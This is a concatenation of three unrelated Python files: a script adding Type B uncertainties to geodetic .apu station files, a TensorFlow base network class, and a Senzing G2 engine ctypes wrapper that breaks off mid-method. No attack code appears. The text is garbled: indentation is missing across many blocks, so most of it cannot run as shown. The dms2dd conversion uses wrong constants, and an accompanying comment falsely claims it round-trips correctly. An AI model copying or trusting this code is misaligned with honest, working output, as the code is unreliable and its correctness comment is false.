#!/usr/bin/env python3
"""This script adds Type B uncertainties to those given in the .apu file.
"""
from sys import exit
from glob import glob
from numpy import matrix
from math import radians, sin, cos, sqrt, atan2, degrees
def dd2dms(dd):
minutes, seconds = divmod(abs(dd) * 3600, 60)
degrees, minutes = divmod(minutes, 60)
dms = degrees + (minutes / 100) + (seconds / 10000)
return dms if dd >= 0 else -dms
def dms2dd(dms):
degmin, seconds = divmod(abs(dms) * 1000, 10)
degrees, minutes = divmod(degmin, 100)
dd = degrees + (minutes / 60) + (seconds / 360)
return dd if dms >= 0 else -dd
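# Illustrative round trip (not part of the original script): HP notation packs
# degrees, minutes and seconds into the decimal places, so 12° 34' 56" is
# written 12.3456:
#   >>> round(dd2dms(12 + 34/60 + 56/3600), 4)
#   12.3456
#   >>> round(dms2dd(12.3456), 9) == round(12 + 34/60 + 56/3600, 9)
#   True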
def rotation_matrix(lat, lon):
"""Returns the 3x3 rotation matrix for a given latitude and longitude
(given in decimal degrees)
See Section 4.2.3 of the DynaNet User's Guide v3.3
"""
(rlat, rlon) = (radians(lat), radians(lon))
rot_matrix = matrix(
[[-sin(rlon), -sin(rlat)*cos(rlon), cos(rlat)*cos(rlon)],
[cos(rlon), -sin(rlat)*sin(rlon), cos(rlat)*sin(rlon)],
[0.0, cos(rlat), sin(rlat)]]
)
return rot_matrix
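# Quick sanity check (illustrative): a rotation matrix is orthonormal, so its
# transpose is its inverse:
#   >>> from numpy import allclose, identity
#   >>> R = rotation_matrix(-35.3, 149.1)
#   >>> bool(allclose(R.transpose() * R, identity(3)))
#   True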
def vcv_cart2local(vcv_cart, lat, lon):
"""Transforms a 3x3 VCV from the Cartesian to the local reference frame
See Section 4.4.1 of the DynaNet User's Guide v3.3
"""
rot_matrix = rotation_matrix(lat, lon)
vcv_local = rot_matrix.transpose() * vcv_cart * rot_matrix
return vcv_local
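# Illustrative property: the similarity transform above preserves the trace, so
# the summed ENU variances equal the summed XYZ variances:
#   >>> V = matrix([[0.04, 0.0, 0.0], [0.0, 0.01, 0.0], [0.0, 0.0, 0.02]])
#   >>> L = vcv_cart2local(V, -35.3, 149.1)
#   >>> bool(abs(float(L.trace()) - float(V.trace())) < 1e-12)
#   True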
def error_ellipse(vcv):
"""Calculate the semi-major axis, semi-minor axis, and the orientation of
the error ellipse calculated from a 3x3 VCV
See Section 7.3.3.1 of the DynaNet User's Guide v3.3
"""
z = sqrt((vcv[0, 0] - vcv[1, 1])**2 + 4 * vcv[0, 1]**2)
a = sqrt(0.5 * (vcv[0, 0] + vcv[1, 1] + z))
b = sqrt(0.5 * (vcv[0, 0] + vcv[1, 1] - z))
orientation = 90 - degrees(0.5 * atan2((2 * vcv[0, 1]),
(vcv[0, 0] - vcv[1, 1])))
return a, b, orientation
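# Worked example (illustrative): with no EN covariance the axes are simply the
# standard deviations, and the larger (east) variance puts the semi-major axis
# at 90 degrees:
#   >>> error_ellipse(matrix([[4.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]))
#   (2.0, 1.0, 90.0)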
def circ_hz_pu(a, b):
"""Calculate the circularised horizontal PU(95%) from the semi-major and
semi-minor axes
"""
q0 = 1.960790
q1 = 0.004071
q2 = 0.114276
q3 = 0.371625
c = b / a
k = q0 + q1 * c + q2 * c**2 + q3 * c**3
r = a * k
return r
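# Illustrative check: for a circular ellipse (a == b) the scale factor reduces
# to q0 + q1 + q2 + q3 ≈ 2.450762, so a 10 mm semi-major axis gives roughly a
# 24.5 mm horizontal PU:
#   >>> round(circ_hz_pu(0.01, 0.01), 6)
#   0.024508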
# Determine the files to use
apuFiles = glob('*.apu')
if len(apuFiles) == 1:
    apuFile = apuFiles[0]
elif len(apuFiles) == 0:
    exit('\nThere is no apu file to work on\n')
else:
    print('\nThere are multiple apu files:')
    for i, apuFile in enumerate(apuFiles, 1):
        print('\t' + str(i) + '\t' + apuFile)
    try:
        fileNum = int(input('Type the number of the file you want to check: '))
    except ValueError:
        exit('Invalid response. Select a number between 1 and ' +
             str(len(apuFiles)))
    if fileNum < 1 or fileNum > len(apuFiles):
        exit('Invalid response. Select a number between 1 and ' +
             str(len(apuFiles)))
    apuFile = apuFiles[fileNum - 1]
# Set the Type B uncertainties (one-sigma standard deviations, in metres)
rvsE = 0.003
rvsN = 0.003
rvsU = 0.006
nonRvsE = 0.006
nonRvsN = 0.006
nonRvsU = 0.012
# Create a list of RVS stations
rvsStations = ['ALBY', 'ALIC_2011201', 'ANDA', 'ARMC', 'ARUB', 'BALA', 'BBOO',
'BDLE', 'BDVL', 'BEEC', 'BING', 'BKNL', 'BNDY', 'BRO1', 'BROC', 'BULA',
'BUR2', 'BURA', 'CEDU', 'CNBN', 'COEN', 'COOB', 'COOL', 'DARW_2003094',
'DODA', 'EDSV', 'ESPA_2016055', 'EXMT', 'FLND', 'FROY', 'GABO', 'GASC',
'HERN', 'HIL1_2006222', 'HNIS', 'HOB2_2004358', 'HUGH', 'HYDN', 'IHOE',
'JAB2_2016065', 'JERV', 'JLCK', 'KALG', 'KARR_2013254', 'KAT1', 'KELN',
'KGIS', 'KILK', 'KMAN', 'LAMB', 'LARR_2011062', 'LIAW', 'LKYA', 'LONA',
'LORD_2014185', 'LURA', 'MAIN', 'MEDO', 'MOBS_2004358', 'MRO1', 'MTCV',
'MTDN', 'MTEM', 'MTMA', 'MULG', 'NBRK', 'NCLF', 'NEBO', 'NHIL', 'NMTN',
'NNOR_2012276', 'NORF', 'NORS', 'NSTA', 'NTJN', 'PARK', 'PERT_2012297',
'PTHL', 'PTKL', 'PTLD_2012123', 'RAVN', 'RKLD', 'RNSP_2015349', 'RSBY',
'SA45', 'SPBY_2011326', 'STNY', 'STR1_2003311', 'SYDN', 'TBOB', 'THEV',
'TID1_2004348', 'TMBO', 'TOMP', 'TOOW', 'TOW2_2011266', 'TURO', 'UCLA',
'WAGN', 'WALH', 'WARA', 'WILU', 'WLAL', 'WMGA', 'WWLG', 'XMIS_2014177',
'YAR2_2013171', 'YEEL', 'YELO_2016082']
# Open output file
fout = open(apuFile + '.typeB', 'w')
# Read in the apu file
apuLines = []
i = 0
with open(apuFile) as f:
for line in f:
        # Record where the header ends: two lines after the column-header line
        if line.startswith('Station'):
            j = i + 2
apuLines.append(line.rstrip())
i += 1
# Print out the header info
for line in apuLines[:j]:
fout.write(line + '\n')
# Loop over the .apu file and read in the uncertainty info
stations = []
hpLat = {}
hpLon = {}
lat = {}
lon = {}
hPU = {}
vPU = {}
semiMajor = {}
semiMinor = {}
orient = {}
xLine = {}
xVar = {}
xyCoVar = {}
xzCoVar = {}
yLine = {}
yVar = {}
yzCoVar = {}
zLine = {}
zVar = {}
for line in apuLines[j:]:
cols = line.split()
numCols = len(cols)
if numCols == 2:
yLine[station] = line
yVar[station] = float(line[131:150].strip())
yzCoVar[station] = float(line[150:].strip())
elif numCols == 1:
zLine[station] = line
zVar[station] = float(line[150:].strip())
else:
station = line[:20].rstrip()
stations.append(station)
hpLat[station] = float(line[23:36])
hpLon[station] = float(line[38:51])
lat[station] = dms2dd(hpLat[station])
lon[station] = dms2dd(hpLon[station])
hPU[station] = float(line[51:62].strip())
vPU[station] = float(line[62:73].strip())
semiMajor[station] = float(line[73:86].strip())
semiMinor[station] = float(line[86:99].strip())
orient[station] = float(line[99:112].strip())
xLine[station] = line[112:]
xVar[station] = float(line[112:131].strip())
xyCoVar[station] = float(line[131:150].strip())
xzCoVar[station] = float(line[150:].strip())
# Create the full Cartesian VCV from the upper triangular
vcv_cart = {}
for stat in stations:
vcv_cart[stat] = matrix([[xVar[stat], xyCoVar[stat], xzCoVar[stat]],
[xyCoVar[stat], yVar[stat], yzCoVar[stat]],
[xzCoVar[stat], yzCoVar[stat], zVar[stat]]
])
# Loop over all the stations
for stat in stations:
# Transform the XYZ VCV to ENU
vcv_local = vcv_cart2local(vcv_cart[stat], lat[stat], lon[stat])
# Add the Type B uncertainty
if stat in rvsStations:
vcv_local[0, 0] += rvsE**2
vcv_local[1, 1] += rvsN**2
vcv_local[2, 2] += rvsU**2
else:
vcv_local[0, 0] += nonRvsE**2
vcv_local[1, 1] += nonRvsN**2
vcv_local[2, 2] += nonRvsU**2
    # Calculate the semi-major axis, semi-minor axis and orientation, and
    # convert the orientation from decimal degrees to HP notation
a, b, orientation = error_ellipse(vcv_local)
orientation = dd2dms(orientation)
# Calculate the PUs
hz_pu = circ_hz_pu(a, b)
vt_pu = 1.96 * sqrt(vcv_local[2, 2])
# Output the uncertainties
line = '{:20}{:>16.9f}{:>15.9f}{:11.4f}{:11.4f}{:13.4f}{:13.4f}{:13.4f}'. \
format(stat, hpLat[stat], hpLon[stat], hz_pu, vt_pu, a, b,
orientation)
line += xLine[stat]
fout.write(line + '\n')
fout.write(yLine[stat] + '\n')
    fout.write(zLine[stat] + '\n')

# Close the output file so the buffered rows are flushed to disk
fout.close()
# ==============================================================================
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2018 ZhicongYan
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ==============================================================================
import os
import sys
sys.path.append('./')
sys.path.append('../')
from cfgs.networkconfig import get_config
import tensorflow as tf
from tensorflow import layers as tl
import tensorflow.contrib.layers as tcl
import numpy as np
from tensorflow.python import pywrap_tensorflow
from netutils.weightsinit import get_weightsinit
from netutils.activation import get_activation
from netutils.normalization import get_normalization
class BaseNetwork(object):
def __init__(self, config, is_training):
assert('name' in config)
self.name = config['name']
self.is_training = is_training
self.moving_variables_collection = 'BATCH_NORM_MOVING_VARS'
self.using_tcl_library = config.get('use tcl library', False)
self.norm_params = {
'is_training' : self.is_training,
'moving_vars_collection' : self.moving_variables_collection
}
self.config = config
		# reuse is False the first time the network is applied to an input tensor
self.reuse = False
self.end_points = {}
act_fn = self.config.get('activation', 'relu')
output_act_fn = self.config.get('output_activation', 'none')
has_bias = self.config.get('has bias', True)
conv_has_bias = self.config.get('conv has bias', has_bias)
fc_has_bias = self.config.get('fc has bias', has_bias)
out_has_bias = self.config.get('out has bias', has_bias)
norm_fn = self.config.get('normalization', 'batch_norm')
norm_params = self.norm_params.copy()
norm_params.update(self.config.get('normalization params', {}))
winit_fn = self.config.get('weightsinit', 'xavier')
binit_fn = self.config.get('biasesinit', 'zeros')
padding = self.config.get('padding', 'SAME')
self.conv_args = {
'norm_fn':norm_fn,
'norm_params':norm_params,
'act_fn':act_fn,
'winit_fn':winit_fn,
'binit_fn':binit_fn,
'padding':padding,
'has_bias':conv_has_bias,
}
self.fc_args = {
'norm_fn':norm_fn,
'norm_params':norm_params,
'act_fn':act_fn,
'winit_fn':winit_fn,
'binit_fn':binit_fn,
'has_bias':fc_has_bias,
}
self.deconv_args = {
'norm_fn':norm_fn,
'norm_params':norm_params,
'act_fn':act_fn,
'winit_fn':winit_fn,
'binit_fn':binit_fn,
'padding':padding,
'has_bias' : conv_has_bias,
}
self.out_conv_args = {
'act_fn':output_act_fn,
'winit_fn':winit_fn,
'binit_fn':binit_fn,
'padding':padding,
'has_bias' : out_has_bias,
}
self.out_fc_args = {
'act_fn':output_act_fn,
'winit_fn':winit_fn,
'binit_fn':binit_fn,
'has_bias': out_has_bias,
}
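	# Illustrative configuration sketch (the key values shown are assumptions,
	# not required settings). Defaults are read from the top-level keys above,
	# and individual layers can override them with '<layer name> <option>' keys:
	#
	#   config = {
	#       'name': 'encoder',
	#       'activation': 'lrelu',
	#       'normalization': 'batch_norm',
	#       'conv1 activation': 'relu',  # per-layer override read by conv2d()
	#   }
	#   net = BaseNetwork(config, is_training=True)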
def uniform_initializer(self, stdev):
return tf.random_uniform_initializer(-stdev*np.sqrt(3), stdev*np.sqrt(3))
def conv2d(self, name, x, nb_filters, ksize, stride=1, *,
norm_fn='none', norm_params=None, act_fn='none', winit_fn='xavier', binit_fn='zeros', padding='SAME', has_bias=True,
disp=True, collect_end_points=True):
if callable(act_fn):
act_fn_str = 'func'
act_fn = act_fn
else:
act_fn_str = self.config.get(name + ' activation', act_fn)
act_fn = get_activation(act_fn_str)
if callable(norm_fn):
norm_fn_str = 'func'
norm_fn = norm_fn
else:
norm_fn_str = self.config.get(name + ' normalization', norm_fn)
norm_fn = get_normalization(norm_fn_str)
winit_fn_str = self.config.get(name + ' weightsinit', winit_fn)
if 'special' in winit_fn_str:
split = winit_fn_str.split()
winit_name = split[0]
if winit_name == 'he_uniform':
input_nb_filters = int(x.get_shape()[-1])
fan_in = input_nb_filters * (ksize**2)
fan_out = nb_filters * (ksize**2) / (stride**2)
filters_stdev = np.sqrt(4.0/(fan_in + fan_out))
winit_fn = self.uniform_initializer(filters_stdev)
else:
				raise Exception('Unknown weights initializer function name: ' + winit_fn_str)
else:
winit_fn = get_weightsinit(winit_fn_str)
binit_fn_str = self.config.get(name + ' biasesinit', binit_fn)
binit_fn = get_weightsinit(binit_fn_str)
_padding = self.config.get(name + ' padding', padding)
if self.using_tcl_library:
x = tcl.conv2d(x, nb_filters, ksize, stride=stride,
activation_fn=act_fn,
normalizer_fn=norm_fn,
normalizer_params=norm_params,
weights_initializer=winit_fn,
padding=_padding,
scope=name)
else:
x = tl.conv2d(x, nb_filters, ksize, strides=stride,
padding=_padding,
use_bias=has_bias,
kernel_initializer=winit_fn,
bias_initializer=binit_fn,
trainable=True,
name=name)
		if not self.using_tcl_library:
			# tcl.conv2d above already applies normalization and activation
			# internally; the tf.layers path applies neither, so apply them here.
			with tf.variable_scope(name):
				if norm_fn is not None:
					norm_params = norm_params or {}
					x = norm_fn(x, **norm_params)
				if act_fn is not None:
					x = act_fn(x)
if disp:
print('\t\tConv2D(' + str(name) + ') --> ', x.get_shape(), ' ', (act_fn_str, norm_fn_str, winit_fn_str, _padding))
if collect_end_points:
self.end_points[name] = x
return x
def deconv2d(self, name, x, nb_filters, ksize, stride, *,
norm_fn='none', norm_params=None, act_fn='relu', winit_fn='xavier', binit_fn='zeros', padding='SAME', has_bias=True,
disp=True, collect_end_points=True):
if callable(act_fn):
act_fn_str = 'func'
act_fn = act_fn
else:
act_fn_str = self.config.get(name + ' activation', act_fn)
act_fn = get_activation(act_fn_str)
if callable(norm_fn):
norm_fn_str = 'func'
norm_fn = norm_fn
else:
norm_fn_str = self.config.get(name + ' normalization', norm_fn)
norm_fn = get_normalization(norm_fn_str)
winit_fn_str = self.config.get(name + ' weightsinit', winit_fn)
if 'special' in winit_fn_str:
split = winit_fn_str.split()
winit_name = split[0]
if winit_name == 'he_uniform':
input_nb_filters = int(x.get_shape()[-1])
fan_in = input_nb_filters * (ksize**2) / (stride**2)
fan_out = nb_filters * (ksize**2)
filters_stdev = np.sqrt(4.0/(fan_in + fan_out))
winit_fn = self.uniform_initializer(filters_stdev)
else:
				raise Exception('Unknown weights initializer function name: ' + winit_fn_str)
else:
winit_fn = get_weightsinit(winit_fn_str)
binit_fn_str = self.config.get(name + ' biasesinit', binit_fn)
binit_fn = get_weightsinit(binit_fn_str)
_padding = self.config.get(name + ' padding', padding)
if self.using_tcl_library:
			# note: tcl.conv2d_transpose takes no use_bias argument (biases are
			# controlled via biases_initializer), so it is not passed here
			x = tcl.conv2d_transpose(x, nb_filters, ksize, stride=stride,
activation_fn=act_fn,
normalizer_fn=norm_fn,
normalizer_params=norm_params,
weights_initializer=winit_fn,
padding=_padding,
scope=name)
else:
x = tl.conv2d_transpose(x, nb_filters, ksize, strides=stride,
padding=_padding,
use_bias=has_bias,
kernel_initializer=winit_fn,
bias_initializer=binit_fn,
trainable=True, name=name)
		if not self.using_tcl_library:
			# tcl.conv2d_transpose above already applies normalization and
			# activation internally; the tf.layers path applies neither.
			with tf.variable_scope(name):
				if norm_fn is not None:
					norm_params = norm_params or {}
					x = norm_fn(x, **norm_params)
				if act_fn is not None:
					x = act_fn(x)
if disp:
			print('\t\tDeconv2D(' + str(name) + ') --> ', x.get_shape(), ' ', (act_fn_str, norm_fn_str, winit_fn_str, _padding))
if collect_end_points:
self.end_points[name] = x
return x
def fc(self, name, x, nb_nodes, *,
norm_fn='none', norm_params=None, act_fn='none', winit_fn='xavier', binit_fn='zeros', has_bias=True,
disp=True, collect_end_points=True):
if callable(act_fn):
act_fn_str = 'func'
act_fn = act_fn
else:
act_fn_str = self.config.get(name + ' activation', act_fn)
act_fn = get_activation(act_fn_str)
if callable(norm_fn):
norm_fn_str = 'func'
norm_fn = norm_fn
else:
norm_fn_str = self.config.get(name + ' normalization', norm_fn)
norm_fn = get_normalization(norm_fn_str)
winit_fn_str = self.config.get(name + ' weightsinit', winit_fn)
if 'special' in winit_fn_str:
split = winit_fn_str.split()
winit_name = split[0]
if winit_name == 'glorot_uniform':
input_nb_nodes = int(x.get_shape()[-1])
filters_stdev = np.sqrt(2.0/(input_nb_nodes + nb_nodes))
winit_fn = self.uniform_initializer(filters_stdev)
else:
				raise Exception('Unknown weights initializer function name: ' + winit_fn_str)
else:
winit_fn = get_weightsinit(winit_fn_str)
binit_fn_str = self.config.get(name + ' biasesinit', binit_fn)
binit_fn = get_weightsinit(binit_fn_str)
if self.using_tcl_library:
x = tcl.fully_connected(x, nb_nodes,
activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
weights_initializer=winit_fn, scope=name)
else:
x = tl.dense(x, nb_nodes, use_bias=has_bias, kernel_initializer=winit_fn,
bias_initializer=binit_fn,
trainable=True, name=name)
		if not self.using_tcl_library:
			# tcl.fully_connected above already applies normalization and
			# activation internally; the tf.layers path applies neither.
			with tf.variable_scope(name):
				if norm_fn is not None:
					norm_params = norm_params or {}
					x = norm_fn(x, **norm_params)
				if act_fn is not None:
					x = act_fn(x)
if disp:
print('\t\tFC(' + str(name) + ') --> ', x.get_shape(), ' ', (act_fn_str, norm_fn_str, winit_fn_str))
if collect_end_points:
self.end_points[name] = x
return x
def concat(self, name, x_list, disp=True, collect_end_points=True):
x = tf.concat(x_list, axis=3)
if disp:
print('\t\tConcat(' + str(name) + ') --> ', x.get_shape())
if collect_end_points:
self.end_points[name] = x
return x
def maxpool2d(self, name, x, size, stride, padding='SAME', disp=True, collect_end_points=True):
_padding = self.config.get(name + ' padding', padding)
x = tcl.max_pool2d(x, size, stride=stride, padding=_padding, scope=name)
if disp:
print('\t\tMaxPool(' + str(name) + ') --> ', x.get_shape())
if collect_end_points:
self.end_points[name] = x
return x
	def upsample2d(self, name, x, size):
		# Minimal sketch (assumption: `size` is an integer scale factor), using
		# nearest-neighbour resizing via tf.image.resize_images
		height, width = int(x.get_shape()[1]), int(x.get_shape()[2])
		return tf.image.resize_images(x, [height * size, width * size],
				method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)
def activation(self, x, act_fn='relu'):
if not callable(act_fn):
act_fn = get_activation(act_fn)
return act_fn(x)
def zero_padding2d(self, x, padding):
		if isinstance(padding, int):
			padding = ((padding, padding), (padding, padding))
		elif isinstance(padding, (list, tuple)) and isinstance(padding[0], int) and isinstance(padding[1], int):
			padding = ((padding[0], padding[0]), (padding[1], padding[1]))
		else:
			raise ValueError('BaseNetwork : padding error')
		# spatial_2d_padding lives in the Keras backend, not at the top level of tf
		return tf.keras.backend.spatial_2d_padding(x, padding=padding, data_format='channels_last')
@property
def vars(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name)
@property
def trainable_vars(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name)
@property
def conv_vars(self):
return [var for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name) if self.name+'/conv' in var.name]
@property
def top_vars(self):
return [var for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name) if self.name+'/fc' in var.name]
@property
def store_vars(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name) + tf.get_collection(self.moving_variables_collection, scope=self.name)
@property
def moving_vars(self):
return tf.get_collection(self.moving_variables_collection, scope=self.name)
@property
def all_vars(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)
@property
def histogram_summary_list(self):
return [tf.summary.histogram(var.name, var) for var in self.store_vars]
def find_pretrained_weights_path(self, weights_filename, throw_not_found_error=False):
		# search the candidate model directories in order; return the first match
		candidate_dirs = ['C:\\Models', 'E:\\Models', 'F:\\Models',
				'/mnt/data01/models/', '/mnt/data02/models/',
				'/mnt/data03/models/', '/mnt/data04/models/']
		for candidate_dir in candidate_dirs:
			model_path = os.path.join(candidate_dir, weights_filename)
			if os.path.exists(model_path):
				return model_path
		if throw_not_found_error:
			raise ValueError('Base Network : the pretrained weights file ' + weights_filename + ' is not found')
		return None
def load_pretrained_weights(self, sess):
print('base network load pretrained weights')
return False
def load_pretrained_model_weights(self, sess, cfg, network_name, only_bottom=True):
config_file = get_config(cfg)
asset_filepath = config_file['assets dir']
ckpt_path = os.path.join(asset_filepath, config_file["trainer params"].get("checkpoint dir", "checkpoint"))
ckpt_name = ''
with open(os.path.join(ckpt_path, 'checkpoint'), 'r') as infile:
for line in infile:
if line.startswith('model_checkpoint_path'):
ckpt_name = line[len("model_checkpoint_path: \""):-2]
checkpoint_path = os.path.join(ckpt_path, ckpt_name)
print("Load checkpoint : ", checkpoint_path)
reader = pywrap_tensorflow.NewCheckpointReader(checkpoint_path)
var_to_shape_map = reader.get_variable_to_shape_map()
assign_list = []
var_list = self.all_vars
var_dict = {var.name.split(':')[0] : var for var in var_list}
for key in var_to_shape_map:
if key.startswith(network_name):
if only_bottom and 'fc' in key:
continue
var_name = self.name + '/' + key[len(network_name)+1:]
assign_list.append(tf.assign(var_dict[var_name], reader.get_tensor(key)))
assign_op = tf.group(assign_list)
sess.run(assign_op)
return True
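	# Illustrative call pattern (the cfg path and the source network name are
	# hypothetical):
	#
	#   with tf.Session() as sess:
	#       sess.run(tf.global_variables_initializer())
	#       net.load_pretrained_model_weights(sess, 'configs/pretrain.json',
	#                                         'encoder', only_bottom=True)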
# ==============================================================================
from ctypes import *
import threading
import json
import os
tls_var = threading.local()
import csv
csv.field_size_limit(500000)
from G2Exception import TranslateG2ModuleException, G2ModuleNotInitialized, G2ModuleGenericException
def resize_return_buffer(buf_, size_):
""" callback function that resizs return buffer when it is too small
Args:
size_: size the return buffer needs to be
"""
try:
if (sizeof(tls_var.buf) < size_) :
tls_var.buf = create_string_buffer(size_)
except AttributeError:
tls_var.buf = create_string_buffer(size_)
return addressof(tls_var.buf)
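# Illustrative note: the G2 C API invokes this callback whenever a response is
# larger than the buffer it was handed; keeping the buffer in thread-local
# storage keeps concurrent calls from different threads safe. Sketch of the
# round trip (sizes are made up):
#   resize_return_buffer(None, 65535)           # pre-allocate 64 KiB
#   addr = resize_return_buffer(None, 1 << 20)  # grown to 1 MiB on demand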
class G2Module(object):
"""G2 module access library
Attributes:
        _lib_handle: handle to the loaded G2 engine library
_resize_func_def: resize function definiton
_resize_func: resize function pointer
_module_name: CME module name
_ini_file_name: name and location of .ini file
"""
# flags for exporting entity data
G2_EXPORT_INCLUDE_ALL_ENTITIES = ( 1 << 0 )
G2_EXPORT_CSV_INCLUDE_FULL_DETAILS = ( 1 << 1 )
G2_EXPORT_INCLUDE_RESOLVED = ( 1 << 2 )
G2_EXPORT_INCLUDE_POSSIBLY_SAME = ( 1 << 3 )
G2_EXPORT_INCLUDE_POSSIBLY_RELATED = ( 1 << 4 )
G2_EXPORT_INCLUDE_NAME_ONLY = ( 1 << 5 )
G2_EXPORT_INCLUDE_DISCLOSED = ( 1 << 6 )
# flags for outputting entity feature data
G2_ENTITY_INCLUDE_ALL_FEATURES = ( 1 << 7 )
G2_ENTITY_INCLUDE_REPRESENTATIVE_FEATURES = ( 1 << 8 )
G2_ENTITY_INCLUDE_SINGLE_FEATURES = ( 1 << 9 )
G2_ENTITY_INCLUDE_NO_FEATURES = ( 1 << 10 )
# flags for finding entity path data
G2_FIND_PATH_PREFER_EXCLUDE = ( 1 << 11 )
# flags for outputting entity relation data
G2_ENTITY_INCLUDE_ALL_RELATIONS = ( 1 << 12 )
G2_ENTITY_INCLUDE_POSSIBLY_SAME_RELATIONS = ( 1 << 13 )
G2_ENTITY_INCLUDE_POSSIBLY_RELATED_RELATIONS = ( 1 << 14 )
G2_ENTITY_INCLUDE_NAME_ONLY_RELATIONS = ( 1 << 15 )
G2_ENTITY_INCLUDE_DISCLOSED_RELATIONS = ( 1 << 16 )
G2_ENTITY_INCLUDE_NO_RELATIONS = ( 1 << 17 )
# flag for getting a minimal entity
G2_ENTITY_MINIMAL_FORMAT = ( 1 << 18 )
# flag for excluding feature scores from search results
G2_SEARCH_NO_FEATURE_SCORES = ( 1 << 19 )
# recommended settings
G2_EXPORT_DEFAULT_FLAGS = G2_EXPORT_INCLUDE_ALL_ENTITIES
G2_ENTITY_DEFAULT_FLAGS = G2_ENTITY_INCLUDE_REPRESENTATIVE_FEATURES | G2_ENTITY_INCLUDE_ALL_RELATIONS
G2_FIND_PATH_DEFAULT_FLAGS = G2_ENTITY_INCLUDE_REPRESENTATIVE_FEATURES | G2_ENTITY_INCLUDE_ALL_RELATIONS
G2_SEARCH_BY_ATTRIBUTES_DEFAULT_FLAGS = G2_ENTITY_INCLUDE_REPRESENTATIVE_FEATURES
G2_SEARCH_BY_ATTRIBUTES_MINIMAL_STRONG = G2_ENTITY_MINIMAL_FORMAT | G2_SEARCH_NO_FEATURE_SCORES | G2_ENTITY_INCLUDE_NO_RELATIONS | G2_EXPORT_INCLUDE_RESOLVED | G2_EXPORT_INCLUDE_POSSIBLY_SAME
G2_SEARCH_BY_ATTRIBUTES_MINIMAL_ALL = G2_ENTITY_MINIMAL_FORMAT | G2_SEARCH_NO_FEATURE_SCORES | G2_ENTITY_INCLUDE_NO_RELATIONS
    # backwards compatibility flags
G2_EXPORT_DEFAULT_REPORT_FLAGS = G2_EXPORT_INCLUDE_ALL_ENTITIES
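    # Illustrative flag arithmetic: flags combine with bitwise OR, e.g. the
    # default entity flags above work out to
    #   (1 << 8) | (1 << 12) == 256 | 4096 == 4352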
def init(self):
""" Initializes the G2 engine
        This should only be called once per process. Currently, re-initializing the
        G2 engine after a destroy requires unloading and reloading the library.
Returns:
int: 0 on success
"""
if self._debug:
print("Initializing G2 module")
resize_return_buffer(None, 65535)
p_module_name = self.prepareStringArgument(self._module_name)
p_ini_file_name = self.prepareStringArgument(self._ini_file_name)
self._lib_handle.G2_init.argtypes = [c_char_p, c_char_p, c_int]
retval = self._lib_handle.G2_init(p_module_name,
p_ini_file_name,
self._debug)
if self._debug:
print("Initialization Status: " + str(retval))
if retval == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif retval == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
elif retval < 0:
raise G2ModuleGenericException("Failed to initialize G2 Module")
return retval
def __init__(self, module_name_, ini_file_name_, debug_=False):
# type: (str, str, bool) -> None
""" G2Module class initialization
Args:
moduleName: A short name given to this instance of the engine
iniFilename: A fully qualified path to the G2 engine INI file (often /opt/senzing/g2/python/G2Module.ini)
verboseLogging: Enable diagnostic logging which will print a massive amount of information to stdout
"""
try:
if os.name == 'nt':
self._lib_handle = cdll.LoadLibrary("G2.dll")
else:
self._lib_handle = cdll.LoadLibrary("libG2.so")
except OSError as ex:
print("ERROR: Unable to load G2. Did you remember to setup your environment by sourcing the setupEnv file?")
print("ERROR: For more information see https://senzing.zendesk.com/hc/en-us/articles/115002408867-Introduction-G2-Quickstart")
print("ERROR: If you are running Ubuntu or Debian please also review the ssl and crypto information at https://senzing.zendesk.com/hc/en-us/articles/115010259947-System-Requirements")
raise G2ModuleGenericException("Failed to load the G2 library")
self._resize_func_def = CFUNCTYPE(c_char_p, c_char_p, c_size_t)
self._resize_func = self._resize_func_def(resize_return_buffer)
self._module_name = module_name_
self._ini_file_name = ini_file_name_
self._debug = debug_
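    # Minimal usage sketch (module name and ini path are illustrative):
    #   g2 = G2Module('myEngine', '/opt/senzing/g2/python/G2Module.ini', False)
    #   g2.init()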
def primeEngine(self):
""" Primes the G2 engine
Return:
None
"""
resize_return_buffer(None, 65535)
self._lib_handle.G2_primeEngine.restype = c_int
self._lib_handle.G2_primeEngine.argtypes = []
ret_code = self._lib_handle.G2_primeEngine()
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
def clearLastException(self):
""" Clears the last exception
Return:
None
"""
resize_return_buffer(None, 65535)
self._lib_handle.G2_clearLastException.restype = None
self._lib_handle.G2_clearLastException.argtypes = []
self._lib_handle.G2_clearLastException()
def getLastException(self):
""" Gets the last exception
"""
resize_return_buffer(None, 65535)
self._lib_handle.G2_getLastException.restype = c_int
